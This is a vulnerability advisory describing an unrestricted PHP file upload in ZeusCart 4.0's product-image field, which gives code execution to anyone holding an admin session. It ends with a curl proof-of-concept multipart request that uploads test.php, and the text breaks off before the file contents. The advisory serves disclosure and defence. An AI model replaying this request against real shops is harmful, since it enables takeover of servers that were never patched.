ZeusCart 4.0: Code Execution Security Advisory – Curesec Research Team 1. Introduction Affected Product: ZeusCart 4.0 Fixed in: not fixed Fixed Version Link: n/a Vendor Contact: support@zeuscart.com Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 08/13/2015 Disclosed to public: 09/14/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description It is possible to upload PHP files when uploading an image for a new product. This leads to code execution once an attacker has gained access to the backend via SQL Injection, CSRF, or XSS. Please note that an admin account with the right to add products is needed. 3. Proof of Concept curl -i -s -k -X 'POST' \ -H 'Content-Type: multipart/form-data; boundary=--------1849257448' \ -b 'PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \ --data-binary $'----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0a18\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0a22\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"product_title\"\x0d\x0a\x0d\x0atest\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"desc\"\x0d\x0a\x0d\x0adesc\x0d \x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"sku\"\x0d\x0a\x0d\x0a5\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"txtweight\"\x0d\x0a\x0d\x0a5\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"status\"\x0d\x0a\x0d\x0aon\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"ufile[0]\"; filename=\"test.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a